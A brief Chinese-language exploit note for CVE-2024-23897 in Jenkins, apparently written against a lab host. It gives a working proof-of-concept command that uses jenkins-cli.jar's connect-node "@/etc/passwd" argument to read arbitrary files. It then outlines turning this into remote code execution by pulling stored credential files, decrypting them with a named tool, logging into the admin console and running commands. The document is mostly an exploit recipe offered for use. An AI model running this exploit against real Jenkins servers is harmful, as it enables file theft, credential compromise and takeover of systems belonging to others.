Jenkins 任意文件读取漏洞-CVE-2024-23897

工具获取

image-hgqs.png

官方描述 在jenkins的链接后面加上 /jnlpJars/jenkins-cli.jar 即可获取

http://192.168.72.129:8080//jnlpJars/jenkins-cli.jar

POC

java -jar jenkins-cli.jar -s http://192.168.72.129:8080 connect-node "@/etc/passwd"

image-jzlh.png

如何RCE

  • 需要使用 jenkins解密工具
https://github.com/hoto/jenkins-credentials-decryptor

image-jupi.png

  • 找到 jenkins安装路径找到这三个文件解密会得到账号密码进入后台,即可执行命令
  • 执行命令可以参考 : https://blog.putdown.top/archives/3580484b-3ef1-4194-9d48-bcd4fdf01f92